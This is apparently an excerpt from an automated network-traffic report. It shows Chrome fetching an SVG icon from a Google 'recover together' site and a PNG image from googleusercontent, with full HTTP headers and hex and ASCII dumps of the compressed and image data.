                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: ca cb c5 5b 4b ca a3 9e 8d 21 82 29 5d 44 79 05 9b 89 c8 c2 4e a5 eb cc 5d 7c 8c a7 7c 4a ae 4e ed d9 ba 70 93 12 59 10 63 7b b8 39 a7 82 95 93 37 fe 47 60 d5 c7 86 2f 5e c6 b9 6c 86 3c 41 ab 44 df 91 6b fc b0 93 80 ef 46 e6 0b 84 3f 27 8d 2d 1b b3 eb d1 ba e3 64 89 e7 c3 9b 8d 1f e6 98 fb 8d c0 3a 14 43 e9 d0 56 ed f3 44 e3 89 85 b8 e7 42 58 f7 7d 70 32 91 26 3e c8 ce ad 0f 6f e4 01 a3 b6 b8 ef 51 b8 2c 50 62 d0 76 e3 c5 63 f3 20 bc a0 59 b4 60 ad 10 d5 b1 4a bf 36 c2 92 f1 30 ff 04 9a 72 a9 2e 29 47 79 72 f1 9b 7c 69 0c 22 e7 1d 78 06 23 b9 a2 5d 39 a1 7b 89 f6 67 65 c7 6b ed 57 ca dc de 72 d2 eb 93 f4 d3 da e5 ea 51 ba 5c 2b 63 3d 6b 55 bb 27 20 13 2b 3a af 7e 2f cb 57 47 63 65 91 ff 36 3e 82 10 51 73 7e 98 3c 01 fc ad 02 84 f0 8e 61 6b bf 97 de f5 59
                                                                                                                                                                                                                                                                                          Data Ascii: [K!)]DyN]||JNpYc{97G`/^l<ADkF?'-d:CVDBX}p2&>oQ,Pbvc Y`J60r.)Gyr|i"x#]9{gekWrQ\+c=kU' +:~/WGce6>Qs~<akY
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 9f d3 e2 81 65 6c 33 a1 4e b6 a3 ef 5a 29 ec 2d d3 2e 20 57 be 4f 75 f1 21 ca ab 9d 3e af a5 17 b8 c6 5b 4f 3e f7 e7 82 02 8c dd 74 86 8f f8 3a 1e 6e c0 b4 4b 5f 59 f7 38 ea 7e 35 d4 b6 ab a6 cf f5 f2 ae de b5 ec ea a3 80 c6 58 1f a4 6b a7 af 77 05 9d f1 d2 3e 18 76 34 45 5c bf a4 ad 5c 6c 36 c7 a0 99 df 56 f6 a4 60 7d 7d b8 d3 72 34 c5 54 cc f3 9d 3a 3c 6d 8a 16 bc 18 3c 75 37 a7 99 30 87 e8 df ae 34 be b7 62 13 e2 9c 6c ee e3 6c bb 1b 47 7d f7 44 da b1 cb e9 c9 e0 d1 f6 a0 bf d9 dc d9 48 a0 dc bc 3a 6f 90 57 ce 13 35 0e 66 3a 57 4a c0 3c dd 38 28 b2 9b e6 da 30 27 f4 d0 3d 59 8a 0b 17 b9 a1 15 b4 26 42 90 cd 17 09 5e 30 18 1f 73 07 de 8c 22 7d 47 19 bb 62 d3 3a 3d 9d d5 39 0c 42 f1 70 14 b4 d1 f1 73 5d c8 3b 75 6e 00 29 9a f3 5d 71 b4 22 6f 12 53 8a 7d
                                                                                                                                                                                                                                                                                          Data Ascii: el3NZ)-. WOu!>[O>t:nK_Y8~5Xkw>v4E\\l6V`}}r4T:<m<u704bllG}DH:oW5f:WJ<8(0'=Y&B^0s"}Gb:=9Bps];un)]q"oS}
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: e3 8a d1 e9 98 4e 28 74 8f 40 65 38 e2 e7 6f 30 8e ee c6 f1 68 fe cd 4a f4 45 6f 7d ff 56 5c fb 28 ce b5 8c 2d 32 bd 19 5d 7a 3b 37 80 3a b0 a3 7e e9 ff aa 6a 52 5b 0c 86 77 e6 89 4b 94 7c 15 03 83 96 89 0d 9b 62 4f 2f 9e 84 4e c3 33 80 76 8c b1 57 7d ca 7a b1 20 b7 27 75 4e 11 e9 ce 02 05 d5 b5 65 07 be 03 53 de 4c 42 fa 23 7f 01 2c af 72 ab df c0 94 21 26 50 af bd 63 8e 7d cb 7a c1 f9 ae 6a 5c c4 71 65 54 d4 c5 34 27 6b fd f0 44 3a 0b de ac 56 89 5f 69 8d e5 e2 66 c0 78 d7 30 ea 03 78 fa 29 4f 62 36 cc bb b0 9e 8b a7 52 bf 2e 89 25 8e 1b 8f c4 6d 44 0e 49 74 66 c1 72 31 63 21 69 9c f1 c7 c5 8f 06 4b 71 64 5d f8 74 57 13 e5 73 b7 22 5e 4e 80 09 ec 19 bc 63 9c 7e 65 9a 40 63 97 6c b9 69 c5 66 ed be e4 ab 0a d8 92 d1 d6 56 75 f9 37 fe 2c ff fa b3 b9 61 5b
                                                                                                                                                                                                                                                                                          Data Ascii: N(t@e8o0hJEo}V\(-2]z;7:~jR[wK|bO/N3vW}z 'uNeSLB#,r!&Pc}zj\qeT4'kD:V_ifx0x)Ob6R.%mDItfr1c!iKqd]tWs"^Nc~e@clifVu7,a[
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 68 24 22 1a bf 17 11 41 ea 4b ec 30 2f c0 f7 13 b2 29 61 45 6a da 8e b7 b1 f7 9a c2 7c 7b 74 1e fb 88 ff c4 19 3e 44 c2 de 63 ac 6c 1c a4 8b 03 93 7d 59 8f b4 65 b0 9d 5d 8e b7 d7 81 b9 ee 81 4b 7d c6 5c 96 f8 a9 38 36 f6 66 1e 6e e0 87 ef c5 89 d7 b9 16 0f 23 93 75 09 1b 73 be 07 41 bb 65 d4 5e b9 92 c7 47 3e f9 f3 50 76 ca 33 e7 ef 98 36 fe 3e aa 45 2c a4 b5 d9 62 7d e3 a8 18 f2 e6 84 b9 de 1c d0 1f e7 96 b8 ca 46 04 41 f3 d1 f3 af ae eb 99 78 1c c5 a0 b6 66 f4 7e 09 64 ec d6 e6 55 db 20 ca d8 9c 12 21 3c c1 6f bc 21 0d 4d c4 2f 8a fb f8 ff ce b2 6e 04 f3 62 eb 97 3a 74 54 81 bb 32 eb c3 1d f5 97 cd c4 77 62 67 9c 17 b5 c7 f5 7d a9 bf 84 fa b7 6d ca 98 cf dc dc 21 fd 52 e3 98 b3 79 64 0e 58 ff b7 3f 01 a8 bb 62 2f 70 1a df f8 fe 0d f9 4b 7b 3f 13 3b 81
                                                                                                                                                                                                                                                                                          Data Ascii: h$"AK0/)aEj|{t>Dcl}Ye]K}\86fn#usAe^G>Pv36>E,b}FAxf~dU !<o!M/nb:tT2wbg}m!RydX?b/pK{?;
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 2c fe b0 d8 98 5a 67 8d a1 ad 1d 6a 7b f7 b7 b6 14 83 66 bf 9e fb f3 03 7e a8 c4 5c 8f 5e a8 1e db ab ac 92 0a f5 86 93 78 16 6d 9b 6a 7e 97 33 6b 0b 98 f9 84 61 7a e1 21 a0 ea f1 66 51 de 74 45 22 0f 62 64 6c 13 68 e7 8a 79 21 98 37 b3 46 81 fb 38 67 69 ec 10 03 3e fb 7a 03 8a df e1 9b 8f 9f e7 1c ee 18 25 d6 7a 0e 30 7a 73 13 87 6a e2 50 6a ce b2 59 3d f5 1d 2c 7d 73 15 5f 3f 32 22 34 b4 4d 6f 0d a4 bf af bf 37 c3 84 ce 4f 85 c0 e0 a7 f6 d4 e5 0d 63 e5 a2 17 1b d3 a2 2b 79 47 20 55 d5 0f eb c0 62 5d 82 dc e8 b6 24 e6 d2 a6 2d 35 f3 87 b6 e7 86 e2 12 07 3a bc d9 97 af ce 6e 5c c5 53 c0 b9 20 8d aa e5 7a 0d bb fa 5c 13 cc 71 df 88 28 63 f3 4b 5d ce 4a e3 6d 3d 76 c8 37 55 fd f1 4f 82 9f 3a 74 44 e2 b9 f6 38 8e 74 b9 1f b1 2f 7b 6f c7 cf 38 70 30 eb fc 24
                                                                                                                                                                                                                                                                                          Data Ascii: ,Zgj{f~\^xmj~3kaz!fQtE"bdlhy!7F8gi>z%z0zsjPjY=,}s_?2"4Mo7Oc+yG Ub]$-5:n\S z\q(cK]Jm=v7UO:tD8t/{o8p0$
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: f0 1b 17 76 c6 c3 f8 c0 98 0b f1 d8 44 fe 76 5e 34 0e da f7 02 9f b1 a7 7a 3c e5 d5 be 5e 9c 72 f3 96 c6 0b 37 51 f6 fc ad 5c fc 89 66 6c a1 7d ca f7 2b 76 b9 b8 37 bf 90 55 2e e3 a3 af 0a 2a a7 9d 26 05 36 65 7f 4c 5b 3b 0c 48 7e c7 4b 1b 00 f6 9f 2e 64 fe 91 38 f9 a7 31 b2 44 5e b3 f4 59 21 8a 07 da 96 7e 82 99 3e e4 c3 03 cd f8 78 53 47 3e e3 ab 4e ff 49 81 c6 fb b0 78 cc ef 6f 85 16 d3 02 1b 7d 61 28 a7 37 16 b5 c9 af 68 46 c6 3e 64 84 d9 6b 98 ac 8a 26 1a 63 1f ff 94 89 8d d2 e4 33 18 0a 78 e8 b1 b9 ec 08 53 c6 97 1e 15 00 0c 5a 73 97 26 83 60 dd d9 9c 02 84 fa b5 c7 1b d5 fb 49 6d 63 bc 31 f7 a6 bd dc e6 9b 76 7a 63 a1 df 60 99 b7 49 c1 cc 27 99 98 67 1b d7 7c cb 4a 4d f0 aa cf bd df de 20 d2 f8 e6 0e 71 cb 23 33 fd e1 91 1b a4 de fc 11 7f c7 dd 1c
                                                                                                                                                                                                                                                                                          Data Ascii: vDv^4z<^r7Q\fl}+v7U.*&6eL[;H~K.d81D^Y!~>xSG>NIxo}a(7hF>dk&c3xSZs&`Imc1vzc`I'g|JM q#3


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          107192.168.2.749883142.250.185.2414435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC772OUTGET /static/images/icons/youtube_play_default.svg HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: recovertogether.withgoogle.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://recovertogether.withgoogle.com/static/css/main-33fc50c967458a1089de4ee9d5e91b3b69156332772c732356503e6ca6006d7e.min.css
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: language-choice=x-default
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC386INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          X-Cloud-Trace-Context: b72a9c56611910d8814be287b3026b52
                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                          Server: Google Frontend
                                                                                                                                                                                                                                                                                          Content-Length: 425
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:40 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:41:41 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=1
                                                                                                                                                                                                                                                                                          ETag: "yqeqwg"
                                                                                                                                                                                                                                                                                          Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC425INData Raw: 1f 8b 08 00 00 00 00 00 02 ff 84 92 cb 6e e3 30 0c 45 7f 85 50 d7 92 29 51 d4 63 10 67 31 7f 52 a4 75 1c 20 8f 22 36 e2 a2 5f 3f 94 ec d8 5d 4c d1 1d 71 21 92 f7 1e 71 37 3c 8e d0 bf 9f 8e fd d8 2a 0e 0a 1e a7 f7 e9 ef ed b3 55 08 08 31 43 d1 a6 d3 db d8 b7 2a 66 05 9f 97 f3 75 68 55 3f 8e 1f 7f 9a 66 9a 26 33 91 b9 dd 8f 8d 43 c4 46 86 a9 fd ee e3 75 ec e1 ad 55 97 18 0c 27 9f 39 45 48 26 06 eb 32 92 3b 68 93 52 ca d1 39 4d c6 93 73 9c 30 48 c9 cc 45 d7 c1 58 6f 33 b1 4f 52 66 a2 9c 88 75 34 58 7a e5 ad 88 98 b2 e7 9c b4 35 21 62 0e 31 7a 4d 68 98 82 cd 81 7f 55 07 ed bc f1 3e 44 0a 11 b0 76 8a 01 cf 36 c2 36 f0 20 86 28 26 94 45 ce 2c 9b 6d 59 8d c8 c1 05 0f 64 96 38 b4 ba f4 19 be d9 94 59 88 96 11 3d 04 e3 e6 98 d5 f2 53 b5 59 e4 54 02 fc 24 0f 08 96
                                                                                                                                                                                                                                                                                          Data Ascii: n0EP)Qcg1Ru "6_?]Lq!q7<*U1C*fuhU?f&3CFuU'9EH&2;hR9Ms0HEXo3ORfu4Xz5!b1zMhU>Dv66 (&E,mYd8Y=SYT$


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          108192.168.2.749884142.250.185.974435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC542OUTGET /3l1m7o0VIsYE1DJXDVlhGMrvGxSzjpczwa5DMARfvEvJe9bV_Hhbdq8GeB4ewqPdPaYDNHxQfarVm_w13BRIOryoo0sTffYinVmjnA=w2000 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: lh3.googleusercontent.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                                                                          Content-Disposition: inline;filename="unnamed.png"
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: fife
                                                                                                                                                                                                                                                                                          Content-Length: 1527289
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:03:38 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 28 Sep 2024 14:03:38 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                                                                          Age: 2282
                                                                                                                                                                                                                                                                                          ETag: "v1"
                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC856INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 02 d0 08 06 00 00 00 cf 7d dd 56 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 f6 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 25 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 98 87 69 00 04 00 00 00 01 00 00 00 ac 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 41 64 6f 62 65 20 41 66 74 65 72 20 45 66 66 65 63 74 73 20 32 30 32 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 00 32 30 32 32 3a 30 39 3a 30 38 20 31 37 3a 32 30 3a 35 30 00 00 04 90 04 00 02 00 00 00 14 00 00 00 e2 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00
                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR}VsRGBeXIfMM*bj(1%r2iHHAdobe After Effects 2020 (Macintosh)2022:09:08 17:20:50
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3a 70 68 6f 74 6f 73 68 6f 70 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 70 68 6f 74 6f 73 68 6f 70 2f 31 2e 30 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 43 6f 6c 6f 72 53 70 61 63 65 3e 36 35 35 33 35 3c 2f 65 78 69 66 3a 43 6f 6c 6f 72 53 70 61 63 65 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 50 69 78 65 6c 58 44 69 6d 65 6e 73 69 6f 6e 3e 31 39 32 30 3c 2f 65 78 69 66 3a 50 69 78 65 6c 58 44 69 6d 65 6e 73 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 50 69 78 65 6c 59 44 69 6d 65 6e 73 69 6f 6e 3e 31 30 38 30 3c 2f 65 78 69 66 3a 50 69 78 65 6c 59 44 69 6d 65 6e 73 69 6f 6e 3e 0a 20 20 20
                                                                                                                                                                                                                                                                                          Data Ascii: obe.com/xap/1.0/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"> <exif:ColorSpace>65535</exif:ColorSpace> <exif:PixelXDimension>1920</exif:PixelXDimension> <exif:PixelYDimension>1080</exif:PixelYDimension>
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 20 20 20 20 3c 2f 72 64 66 3a 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 72 64 66 3a 53 65 71 3e 0a 20 20 20 20 20 20 20 20 20 3c 2f 78 6d 70 4d 4d 3a 48 69 73 74 6f 72 79 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 78 6d 70 2e 64 69 64 3a 65 35 61 35 62 36 62 32 2d 66 62 39 63 2d 34 37 35 66 2d 39 38 63 33 2d 36 35 34 39 38 64 63 61 61 30 38 37 3c 2f 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 37 38 63 63 37 37 31 64 2d 61 30 65 64 2d 30 65 34 35 2d 61 61 37 64 2d 30 65 33 39 38 63 39 65 62 33 66 63
                                                                                                                                                                                                                                                                                          Data Ascii: </rdf:li> </rdf:Seq> </xmpMM:History> <xmpMM:OriginalDocumentID>xmp.did:e5a5b6b2-fb9c-475f-98c3-65498dcaa087</xmpMM:OriginalDocumentID> <xmpMM:DocumentID>adobe:docid:photoshop:78cc771d-a0ed-0e45-aa7d-0e398c9eb3fc
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: f3 82 e7 63 e8 98 35 f7 51 36 c3 ea a6 e7 91 9b c8 27 7b 81 10 8b d3 29 eb d7 78 f9 31 6e 4f ba d3 7c 9c d4 63 51 52 93 f9 e3 d1 f9 17 54 ae fb a5 7d d4 a9 a8 f6 eb a2 6e c6 66 fe 79 dd 43 fd 4d 59 6e 85 f7 c1 01 94 97 e4 53 3e eb 8f 1a 00 1c 7b 9c d2 dd 5c 31 9f c9 5f ce d7 3f 75 1b 6b 59 9e 72 fb 66 ef 85 1e eb c1 d3 a3 ce e5 8e cb e9 22 ce f5 c9 74 13 2e 1f 73 b3 92 20 6a d1 4f 23 e1 e5 6d 08 af 0e c7 7e ed da 9f e7 ac 64 ae 26 f2 d4 2d d7 47 9e cd 01 f3 de 3a 23 00 32 6c ec c5 bc 0d f9 9d 87 55 40 1f ff f4 d3 1f 9a 17 ff f4 e1 c3 cb 1f fe f4 cf 2f 7f f8 e7 3f bc fc e7 ff fc 7f be fc 87 ff f0 1f 5e fe fd bf ff f7 2f ff f1 3f fe 1f 2f 9f 3f 7c 6e de 54 c7 37 0e 6f 08 e5 25 bd 73 b8 d3 e1 fb 1f be 1e a3 cd 51 04 55 2d 90 0c 11 84 fa 8a 97 b2 3f a2 a7 f3
                                                                                                                                                                                                                                                                                          Data Ascii: c5Q6'{)x1nO|cQRT}nfyCMYnS>{\1_?ukYrf"t.s jO#m~d&-G:#2lU@/?^/?/?|nT7o%sQU-?
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 9f ff 97 ff e9 01 31 41 dc 00 fc e2 1b e4 37 4c b0 2e 50 7f 64 d3 ef c7 1f 7e 00 8f 1b 99 f7 3f 02 77 73 89 0d 07 22 e0 c6 c7 36 c3 74 80 9b 84 a8 ed a6 45 ee 33 50 67 03 50 c9 68 38 07 1f bb 43 9e 27 1c b0 26 b6 68 6e fe 6d 83 4e 7d bc f0 10 92 b3 c0 89 c4 36 78 0e f4 37 ae 16 09 86 0b ad 26 25 0d 8d 17 60 ca 1c e5 d9 9b bd 05 c9 a0 2c 68 f9 65 bc 44 2e a3 38 ab d2 09 4c fa a2 b7 3a a8 dd c0 db 5c 7b 8f 0f 7e d0 be b3 d1 a6 10 93 20 61 ca 8e b3 fa c5 b2 56 8d 57 07 7b b5 45 9a e9 bd 1b fb bb 29 e5 06 a0 37 21 6d fa 7d fa f0 f2 91 1b 5d 37 02 ff f4 e1 4f 2f 3f f1 56 4f 37 4f 6f a2 bd e1 66 f3 1d 3a b8 e9 e4 46 94 7c 7f 20 66 6f d1 f5 3d ba be 7f fb 03 20 fd 99 d4 ce da e6 60 b9 f1 ac 0f c5 3c 0b 33 70 d4 b2 5f 55 2d da 96 ec 13 b7 20 da 7e fd 0f 76 83 14
                                                                                                                                                                                                                                                                                          Data Ascii: 1A7L.Pd~?ws"6tE3PgPh8C'&hnmN}6x7&%`,heD.8L:\{~ aVW{E)7!m}]7O/?VO7Oof:F| fo= `<3p_U- ~v
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 87 11 94 ae 87 f1 e9 c9 03 e1 e9 92 54 15 f5 41 11 55 57 7f 3d 01 5f 3e 65 33 fa 66 bb 1f b0 59 8c d5 9b 2e be 87 35 78 ea fd d9 5c 8f 9e 13 67 df 5f 5a 23 48 cd 3c 04 d6 74 57 96 f3 13 08 41 b5 1d 7b da 2c 52 36 5a b5 01 23 19 19 72 f4 d4 c7 d2 e9 e3 ea 0a 8d 87 67 50 1d d4 c8 30 fc 9e 19 ae 75 8b 3b 3b 0f 9d 7a e1 8f 32 93 b1 2b 9a 6f 75 d3 d6 b5 38 62 e7 fa cc 23 e5 d2 22 60 e3 35 9e fa 2b ae 54 84 78 0f a4 fc f9 de 0a 24 f0 f1 aa b3 f1 88 04 0c 98 47 a1 31 e6 e8 fd 46 7b c9 1b f3 5d 96 8a b2 5c bd 6d 26 2a 28 f0 d3 af 8f 6f d1 9e ab bd 67 79 cb 2d 2b e4 0f cd 72 f1 12 a9 ab 54 2b e6 58 f2 a0 9b 5e ea 21 fd c5 78 4a da f8 3a 4a 04 46 8a ca ec 26 28 99 f2 e2 6e a6 63 1b 29 f2 49 1e be 3f 73 93 9c 5f 6b 40 07 b2 a5 d1 82 e9 db 9a 8d f6 5b f2 e3 1d 73 a3
                                                                                                                                                                                                                                                                                          Data Ascii: TAUW=_>e3fY.5x\g_Z#H<tWA{,R6Z#rgP0u;;z2+ou8b#"`5+Tx$G1F{]\m&*(ogy-+rT+X^!xJ:JF&(nc)I?s_k@[s
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 43 e6 2b e6 f1 c1 a7 29 1b dc b9 4c c3 ae 52 1b db 6b 0b bf 45 65 9f 0a c7 c7 1b 47 f3 e8 91 2f 77 be 2a 1b c1 96 be 65 6b 94 b6 92 74 7c 41 b3 62 fe 4e 9e 74 50 99 43 cd 67 f8 98 2e 65 3d 0a 75 fd fb 5c 7f 38 df 3e fd 5b 0e b6 2e 7a c2 1c 0f 2e 64 f7 f4 9f e3 40 6e 93 e5 4d 9d 5a 9b 73 6f c9 cb 15 b3 90 97 f3 27 78 b7 58 bb aa d4 4f 3b 18 41 77 d4 b4 54 e1 ba 64 09 4f dd a9 27 af 35 8d d9 3c 19 ce 2b 3e e9 8e 31 6c 6c 61 b3 88 30 53 ab f9 56 62 e0 c0 cc 19 cf 16 c7 8f b4 ce cf fe 59 76 03 b8 ba 1b 84 4a 38 5d d3 03 7f ab 9b 6f 92 22 9d 1c d3 bb 19 19 be 3e 90 ae 6b 1e 3c 44 4d 06 67 cb 51 6f 8d 73 14 a6 6f 97 67 07 43 39 0d 78 e5 4d 56 62 c1 d5 05 7b 02 72 90 6c 62 7c 7e 5c 40 18 bf ea a9 07 a0 15 86 c2 da fa 91 7c 76 2d f1 81 eb bb 6b b5 0f 6c 00 7e e6
                                                                                                                                                                                                                                                                                          Data Ascii: C+)LRkEeG/w*ekt|AbNtPCg.e=u\8>[.z.d@nMZso'xXO;AwTdO'5<+>1lla0SVbYvJ8]o">k<DMgQosogC9xMVb{rlb|~\@|v-kl~
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 99 c7 63 23 1f 3f e2 17 60 da d2 57 64 f1 f7 67 72 5b 7f 3b 59 ed 6b f0 de 20 34 ad cd 5e 7c d9 a2 d2 8b 37 1b 7c 5e b4 bc 51 53 44 5f bb 56 24 30 87 87 d7 49 5d ac 5e d9 27 50 db c0 bf ce 33 ae 81 40 6a 12 2f 86 62 b3 21 69 24 eb d4 1d e6 08 e7 fa 61 a1 2f 00 18 eb 61 4f 86 b7 a3 a6 b5 3a 16 43 68 40 88 9f 4f 38 19 de 2b 5b b8 31 08 24 f8 16 65 5e d9 3f ef 1d 56 44 fa 58 dd 68 44 33 3a 27 c0 c9 70 84 df 05 ab 10 7c 75 72 6b 9a cb 4a 5c c9 ed 13 23 c6 1d f1 16 1d d8 01 4a 9c 55 5e 39 f2 40 3f eb f9 47 b4 50 d7 27 d9 2d bb 71 95 2e 6e e1 8b eb 63 ed e6 90 3e 54 ae 1c 64 7d e5 cb 70 37 6c e3 94 7e 22 ff 42 89 27 b6 48 2f bb f1 9c 5e b4 a2 4a f5 aa c4 01 75 bc 4c f8 24 ce e7 16 33 e8 92 9d 2e 66 e4 26 8f 87 77 cc 72 c0 e6 ca ec 30 6f 2a 57 67 98 cb 5a f9 e9
                                                                                                                                                                                                                                                                                          Data Ascii: c#?`Wdgr[;Yk 4^|7|^QSD_V$0I]^'P3@j/b!i$a/aO:Ch@O8+[1$e^?VDXhD3:'p|urkJ\#JU^9@?GP'-q.nc>Td}p7l~"B'H/^JuL$3.f&wr0o*WgZ
